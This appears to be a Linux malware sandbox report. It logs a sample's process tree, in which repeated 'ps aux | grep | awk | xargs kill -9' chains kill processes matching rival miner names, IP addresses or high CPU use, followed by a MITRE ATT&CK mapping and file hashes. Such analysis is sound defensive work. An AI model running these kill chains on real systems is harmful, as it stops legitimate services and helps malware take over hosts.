/bin/grepgrep "/tmp/2Ne80*"2⤵PID:1907
-
-
/bin/psps aux2⤵
- Process Discovery
- Reads runtime system information
PID:1905
-
-
/bin/grepgrep -v grep2⤵PID:1906
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1909
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1913
-
-
/bin/grepgrep -v grep2⤵PID:1911
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1914
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1910
-
-
/bin/grepgrep IOFoqIgyC0zmf2UR2⤵PID:1912
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1918
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1919
-
-
/bin/grepgrep 45.76.122.922⤵PID:1917
-
-
/bin/grepgrep -v grep2⤵PID:1916
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1915
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1923
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1924
-
-
/bin/grepgrep 51.38.191.1782⤵PID:1922
-
-
/bin/psps aux2⤵
- Process Discovery
PID:1920
-
-
/bin/grepgrep -v grep2⤵PID:1921
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1928
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1929
-
-
/bin/grepgrep 51.15.56.1612⤵PID:1927
-
-
/bin/grepgrep -v grep2⤵PID:1926
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1925
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1933
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1934
-
-
/bin/grepgrep 86s.jpg2⤵PID:1932
-
-
/bin/grepgrep -v grep2⤵PID:1931
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1930
-
-
/bin/grepgrep -v grep2⤵PID:1936
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1938
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1939
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
PID:1935
-
-
/bin/grepgrep aGTSGJJp2⤵PID:1937
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1943
-
-
/bin/grepgrep nMrfmnRa2⤵PID:1942
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1944
-
-
/bin/grepgrep -v grep2⤵PID:1941
-
-
/bin/psps aux2⤵
- Process Discovery
PID:1940
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1948
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1949
-
-
/bin/grepgrep PuNY5tm22⤵PID:1947
-
-
/bin/grepgrep -v grep2⤵PID:1946
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
PID:1945
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1953
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1954
-
-
/bin/grepgrep -v grep2⤵PID:1951
-
-
/bin/grepgrep I0r8Jyyt2⤵PID:1952
-
-
/bin/psps aux2⤵
- Process Discovery
PID:1950
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1958
-
-
/bin/grepgrep AgdgACUD2⤵PID:1957
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1959
-
-
/bin/grepgrep -v grep2⤵PID:1956
-
-
/bin/psps aux2⤵
- Process Discovery
PID:1955
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1964
-
-
/bin/grepgrep uiZvwxG82⤵PID:1963
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1965
-
-
/bin/grepgrep -v grep2⤵PID:1962
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
PID:1961
-
-
/bin/grepgrep hahwNEdB2⤵PID:1968
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1969
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1970
-
-
/bin/grepgrep -v grep2⤵PID:1967
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
PID:1966
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1974
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1975
-
-
/bin/grepgrep BtwXn5qH2⤵PID:1973
-
-
/bin/grepgrep -v grep2⤵PID:1972
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1971
-
-
/bin/grepgrep 3XEzey2T2⤵PID:1978
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1980
-
-
/bin/grepgrep -v grep2⤵PID:1977
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
PID:1976
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1979
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1984
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1985
-
-
/bin/grepgrep t2tKrCSZ2⤵PID:1983
-
-
/bin/grepgrep -v grep2⤵PID:1982
-
-
/bin/psps aux2⤵
- Process Discovery
PID:1981
-
-
/bin/grepgrep HD7fcBgg2⤵PID:1988
-
-
/bin/grepgrep -v grep2⤵PID:1987
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1989
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1990
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1986
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1994
-
-
/bin/grepgrep zXcDajSs2⤵PID:1993
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1995
-
-
/bin/grepgrep -v grep2⤵PID:1992
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
PID:1991
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1999
-
-
/bin/grepgrep 3lmigMo2⤵PID:1998
-
-
/bin/grepgrep -v grep2⤵PID:1997
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:2000
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1996
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2004
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:2005
-
-
/bin/grepgrep AkMK4A22⤵PID:2003
-
-
/bin/grepgrep -v grep2⤵PID:2002
-
-
/bin/psps aux2⤵
- Process Discovery
PID:2001
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2009
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2010
-
-
/bin/grepgrep -v grep2⤵PID:2007
-
-
/bin/grepgrep AJ2AkKe2⤵PID:2008
-
-
/bin/psps aux2⤵
- Process Discovery
PID:2006
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2014
-
-
/bin/grepgrep -v grep2⤵PID:2012
-
-
/bin/grepgrep HiPxCJRS2⤵
- System Network Configuration Discovery
PID:2013
-
-
/bin/psps aux2⤵
- Process Discovery
PID:2011
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:2015
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2019
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2020
-
-
/bin/grepgrep -v grep2⤵PID:2017
-
-
/bin/grepgrep http_0xCC0302⤵PID:2018
-
-
/bin/psps aux2⤵
- Process Discovery
PID:2016
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2024
-
-
/bin/grepgrep http_0xCC0312⤵PID:2023
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2025
-
-
/bin/psps aux2⤵
- Process Discovery
PID:2021
-
-
/bin/grepgrep -v grep2⤵PID:2022
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2029
-
-
/bin/grepgrep http_0xCC0322⤵PID:2028
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:2030
-
-
/bin/grepgrep -v grep2⤵PID:2027
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
PID:2026
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2034
-
-
/bin/grepgrep http_0xCC0332⤵PID:2033
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:2035
-
-
/bin/grepgrep -v grep2⤵PID:2032
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
PID:2031
-
-
/bin/grepgrep C4iLM4L2⤵PID:2038
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2040
-
-
/bin/grepgrep -v grep2⤵PID:2037
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2039
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
PID:2036
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2044
-
-
/bin/grepgrep aziplcr72qjhzvin2⤵
- System Network Configuration Discovery
PID:2043
-
-
/bin/grepgrep -v grep2⤵PID:2042
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:2045
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
PID:2041
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:2049
-
-
/usr/bin/awkawk "{ if(substr(\$11,1,2)==\"./\" && substr(\$12,1,2)==\"./\") print \$2 }"2⤵PID:2048
-
-
/bin/grepgrep -v grep2⤵PID:2047
-
-
/bin/psps aux2⤵
- Process Discovery
PID:2046
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2053
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2054
-
-
/bin/grepgrep -v grep2⤵PID:2051
-
-
/bin/grepgrep /boot/vmlinuz2⤵PID:2052
-
-
/bin/psps aux2⤵PID:2050
-
-
/bin/grepgrep i4b503a52cc52⤵PID:2057
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2058
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2059
-
-
/bin/grepgrep -v grep2⤵PID:2056
-
-
/bin/psps aux2⤵
- Process Discovery
- Reads runtime system information
PID:2055
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2063
-
-
/bin/grepgrep -v grep2⤵PID:2061
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2064
-
-
/bin/grepgrep dgqtrcst23rtdi3ldqk322j22⤵PID:2062
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
PID:2060
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2069
-
-
/bin/grepgrep 2g0uv7npuhrlatd2⤵PID:2067
-
-
/bin/grepgrep -v grep2⤵PID:2066
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2068
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:2065
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2074
-
-
/bin/grepgrep nqscheduler2⤵PID:2072
-
-
/bin/grepgrep -v grep2⤵PID:2071
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2073
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:2070
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2078
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2079
-
-
/bin/grepgrep rkebbwgqpl4npmm2⤵PID:2077
-
-
/bin/psps aux2⤵
- Process Discovery
PID:2075
-
-
/bin/grepgrep -v grep2⤵PID:2076
-
-
/usr/bin/awkawk "\$3>10.0{print \$2}"2⤵PID:2084
-
-
/bin/grepgrep -v aux2⤵PID:2082
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2085
-
-
/bin/grepgrep -v grep2⤵PID:2081
-
-
/bin/grepgrep "]"2⤵PID:2083
-
-
/bin/psps aux2⤵
- Process Discovery
PID:2080
-
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Abuse Elevation Control Mechanism
1Sudo and Sudo Caching
1Scheduled Task/Job
1Cron
1Defense Evasion
Abuse Elevation Control Mechanism
1Sudo and Sudo Caching
1Impair Defenses
1Disable or Modify System Firewall
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
5B
MD5727479ef7cedf30c03459bec7d87b0f0
SHA12082e7f715f058acab2398d25d135cf5f4c0ce41
SHA25629872037c9573567744ef10ed2de57864ded7554c9fa2ef03fc1244c65794ba6
SHA5124cb59d37f8481f9bb2745f494baa0910a68aad40ac2903ef1513547e091e1e772a5f9436f789ab91fcafb75b8a28c2112ede89004be41f33c01d936b542ca6ba
-
Filesize
825B
MD5272992edc7c727aa061ae62d74ba6cf1
SHA1c96a08ec16772ca0e3e7f5e6747dcee617df10a1
SHA256dcea0f6b13d47ba6bc4ce72cb413fe4971ca847e75e7460a94c8d61654db478d
SHA5129df349eddaa24b97adbe89d5c01f5746a945e0063306086470c4c49fdba626ffdf60a3125cc4026192f113812aba4dd26edbf742825a8e168b90334ea93c5a29
-
Filesize
1KB
MD50481a7759dc7e68d4f6ad5e4c3ba3a3a
SHA1da38e60fcf8b1debaaf63ef07fcfae5684a53825
SHA25642202c89c6e48691a32ca0eae3786d7aba5515ca0e2f305130eeb19923e52c14
SHA51272d7c9832f9f61647990d8dd201875bec05b9a18f2db50988987099ae196006f5f49c383ed7d7a395671b8a23998be779b32054ad0afd5110361c220e69a70b3
-
Filesize
175B
MD55a695c5d045ade25933e17b96e52b695
SHA14ac04e83ee447a597fbef0faa2488d574a228d30
SHA2567ed2b62df705d1e15657c817bb034adbab8f006c4751843c9867494ace40fb71
SHA512b191d33b358e7574d0edd5899d191ec6516180a27f04806e1978f976193cfc23755e492f5960d49f2f5bec4f6c6392c8322982750287e32bb9a35091696130cf
-
Filesize
175B
MD5226a7c09ee58c2b5c20fc0040412ffb3
SHA105a82023179aa4f3ce4a3cac7e56f3eab14d4889
SHA256961b522ab8bab49d2fba3784ec334a20b4bca09e41eed96b36cacd24667431d6
SHA5127fe38aee43d73765fe1d6026c6facf9997ccae3840fed9c576603da5d4e99e5ca1b6bdfd2bcb700631fd9dcb59e06c49d52c7520e97caf0da45d13d9b908e1f0
-
Filesize
175B
MD50ad4c589b6640bb0d8db8aa81fb6a808
SHA14bca0f80c9ce18c4e9f0a976b515d32350104d1f
SHA2563d553af685297b8e35cdb9a84ddbf61bb471a9278888c158ea34a1235384cdfc
SHA5125b0266556870c1e94f14089d62449cfa1836c2741fd31bd8fc6f83ebb26c0924c1fd400ab77e70c0bf9ae9f32b6bcc6425dae2f6349a1f610c486ec1e99c4b7d
-
Filesize
175B
MD533523e1e2fd95e19177f7153ddd23cc3
SHA1bb9997f2cbc0ae5ba8584f65ff5641642a33f861
SHA256f580a6ed1223ae839070b3a13bec026053fd34f7b4e1acc6499c197cf8fb1065
SHA512da80a4922da4a7812bc7366e1f8e14f2d8e24c6f887b68bb3a1c6a955467cca9cc09c8b44dd37394032bb393952d228c8e14a3e4c1acf1ea2b5cd5849953fd08
-
Filesize
175B
MD59914fd0a2354a7613127701029e151da
SHA15c75921c47958fc15c8de04af230332f4a162ecb
SHA2569468985df6588dea5eba96a2d9cdaee4cb06e0edc930cd7f9ac46a621287593d
SHA512d0788a0594c90edfdfbd97aeb8e3d157462bc1352573d09b07d498fa347f416286a8d5cc15cb6b719bd5c6762ff357bc9d79282328d068f973b3ad11de9158f1
-
Filesize
128B
MD5867aa97954a5e3f1b79b8d61eaf28687
SHA17ac2ab75fd163e9904821138db28a20cc0b3c82d
SHA256382929de45f8b2c7f39dcb3f617210071f8116eda658c1eb53fa90114a637b0e
SHA512c0be7ff5a8c520a8cc75cbee241e37f290799c50a69171078a02fa38aacd2e54bf3343b0170be4e07c3801e1fdf37e4eb1211359fabc0078d5df36414009ca47
-
Filesize
34B
MD5d7d96d63d643a4ce3e408eba7dfcedc5
SHA1c53607f95c5c57beafc1d8266646797a035f76ea
SHA25621db3a59b2d0ce18fb250b787d6e2c85d12919f5fdf1448c8f48207c4083b159
SHA512703a03e54776a6ad9b8adc6c475bbc91c06502618fa3b6f495b1a01a4f6f7aa6fb65dc6ba6885ddc6af961627062f1ce1e1d66688288cbd3bef7754d249fa9b3
-
Filesize
146B
MD515c67b66c7b7a8041c406dea8851eabc
SHA18c743c5b1701e2a5f4072689bc95833bf681a92b
SHA2562169d4ac438173a8c6a024732f39451c87c4436a5ace14c7f372eb1e1947939f
SHA5121c26e33f53c6f345be99f926140f880e010f8c709c84bd102ccb464127d36f6ab7a59c52c85d8c93a861104efaf93647aab15587a84ef6231bf2d10a4456fbe5
-
Filesize
915B
MD5b367ed5b5320c61549cc9c7395820a7b
SHA17a2bf46dd558637ab600423bb5aa8f5edb767920
SHA2566b602a8148a657a3b6722b0a92a826acbc19f40c4b3fedcee88980332ed82d26
SHA5126d91ab2b3657f938fa24c5bf2c2e7af89a2241294963343fb2990a1c6d5b69061b9aca72a28fbf4eddfe3ff2df09da1ec0719a065d8e35a828fd5995a1e4ea85
-
Filesize
288B
MD52e713bed3707a92bbd9726111dcf6120
SHA14e0f5fa01143bbf46107efb4d94c55bcb77b31b6
SHA256abb85195815aaa4a1db0ca526afb2cd36ace4735351cd586743454d010f02c1b
SHA512813cede31c9df90a911ae2dacb780ec4819f7baecb9d5e788b4b34bc0537b7638473ba3a08c7efdd812db731c1ad62c6eec6225206b60f3996347ca3fc55f61c
-
Filesize
89B
MD528bedbfbe05cfc577bf09835fd1ecef9
SHA1889edf76b4fe6808ff4ef33c93b7861720207592
SHA2564c99f56cbcc29f6c8a4b6063493603b1f8d4c1d9df87fab042f3af320cb679b5
SHA512db8dc7af9abded8d8768d4088c8b4cd54e92cd860bd1c2ed656cebf54a32ff69450805332d06948640b1a026d26658d8a2e323b4b5b809e4d4b08218f81ede52
-
Filesize
288B
MD5584a5201907d91047d000d8c9a5293c0
SHA177cf837cf4a4e9bcad7cf733551aff302740c55d
SHA256af503064d42f84d69de6af2e3d1f2453726605fb39af4bf5a53902b1b2f79e33
SHA512038eb043a3f51d2f9b5d9164a6c6e5d06db8d6efc956b6cd336687b1f1c2c409e9d82bb1df551744c7fce201837e2826b0a4ea4c38351dc220b29997c86c7ab1
-
Filesize
89B
MD5f49ad1b42248ec186812a00c98c0275b
SHA1e0e9106d54fbb7b1c83f367356cb8155d8305260
SHA256b3f197911df1cf30d5036243314e400ecae0ff7f641b4467e3d8d44a1f2bf82c
SHA512c553001efe0c2d27432f5ada4725744ee34954ffa7dd3163218dac073511c1524f5b6b85cc78c15b260267ed673646ee9a49c7ff05d7fb1d11438aea84c9eee3